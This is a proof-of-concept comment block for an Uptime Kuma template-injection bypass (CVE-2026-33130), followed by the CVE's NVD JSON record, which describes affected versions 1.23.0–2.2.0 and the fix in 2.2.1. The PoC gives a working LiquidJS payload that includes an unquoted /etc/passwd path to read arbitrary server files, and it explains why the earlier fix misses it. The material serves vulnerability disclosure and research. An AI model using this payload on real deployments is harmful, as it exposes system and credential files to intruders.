CVE-2026-33130

// PoC for CVE-2026-33130: Uptime Kuma SSTI Bypass // The vulnerability allows reading arbitrary files using unquoted absolute paths in LiquidJS templates. // Context: Inject this payload into a vulnerable notification template field in Uptime Kuma. // Standard SSTI payload with quoted path (BLOCKED by the fix): // {% include "/etc/passwd" %} // Bypass payload using unquoted absolute path (VULNERABLE): // The LiquidJS engine passes unquoted arguments to require.resolve() without proper checks. const maliciousPayload = `{% include /etc/passwd %}`; // Explanation: // 1. The 'include' tag attempts to resolve the path. // 2. The 'root' and 'relativeReference' checks are bypassed because the path is absolute and unquoted. // 3. The fallback logic in liquid.node.js calls require.resolve('/etc/passwd'). // 4. Since the path is absolute and valid on the file system, the file content is read and rendered.

{"cve": {"id": "CVE-2026-33130", "sourceIdentifier": "[email protected]", "published": "2026-03-20T10:16:19.463", "lastModified": "2026-03-24T15:24:16.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uptime Kuma is an open source, self-hosted monitoring tool. In versions 1.23.0 through 2.2.0, the fix from GHSA-vffh-c9pq-4crh doesn't fully work to preventServer-side Template Injection (SSTI). The three mitigations added to the Liquid engine (root, relativeReference, dynamicPartials) only block quoted paths. If a project uses an unquoted absolute path, attackers can still read any file on the server. The original fix in notification-provider.js only constrains the first two steps of LiquidJS's file resolution (via root, relativeReference, and dynamicPartials options), but the third step, the require.resolve() fallback in liquid.node.js has no containment check, allowing unquoted absolute paths like /etc/passwd to resolve successfully. Quoted paths happen to be blocked only because the literal quote characters cause require.resolve('\"/etc/passwd\"') to throw a MODULE_NOT_FOUND error, not because of any intentional security measure. This issue has been fixed in version 2.2.1."}, {"lang": "es", "value": "Uptime Kuma es una herramienta de monitoreo de código abierto y autoalojada. En las versiones 1.23.0 a 2.2.0, la corrección de GHSA-vffh-c9pq-4crh no funciona completamente para prevenir la Inyección de Plantillas del Lado del Servidor (SSTI). Las tres mitigaciones añadidas al motor Liquid (root, relativeReference, dynamicPartials) solo bloquean rutas entre comillas. Si un proyecto utiliza una ruta absoluta sin comillas, los atacantes aún pueden leer cualquier archivo en el servidor. La corrección original en notification-provider.js solo restringe los dos primeros pasos de la resolución de archivos de LiquidJS (a través de las opciones root, relativeReference y dynamicPartials), pero el tercer paso, el fallback de require.resolve() en liquid.node.js no tiene una verificación de contención, permitiendo que rutas absolutas sin comillas como /etc /passwd se resuelvan con éxito. Las rutas entre comillas se bloquean solo porque los caracteres de comillas literales hacen que require.resolve('\"/etc /passwd\"') arroje un error MODULE_NOT_FOUND, no debido a ninguna medida de seguridad intencional. Este problema ha sido corregido en la versión 2.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-98"}, {"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uptime.kuma:uptime_kuma:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.23.0", "versionEndExcluding": "2.2.1", "matchCriteriaId": "F26D862B-BDCF-48F3-A4FE-071B19753CE3"}]}]}], "references": [{"url": "https://github.com/advisories/GHSA-vffh-c9pq-4crh", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/louislam/uptime-kuma/releases/tag/2.2.1", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/louislam/uptime-kuma/security/advisories/GHSA-v832-4r73-wx5j", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}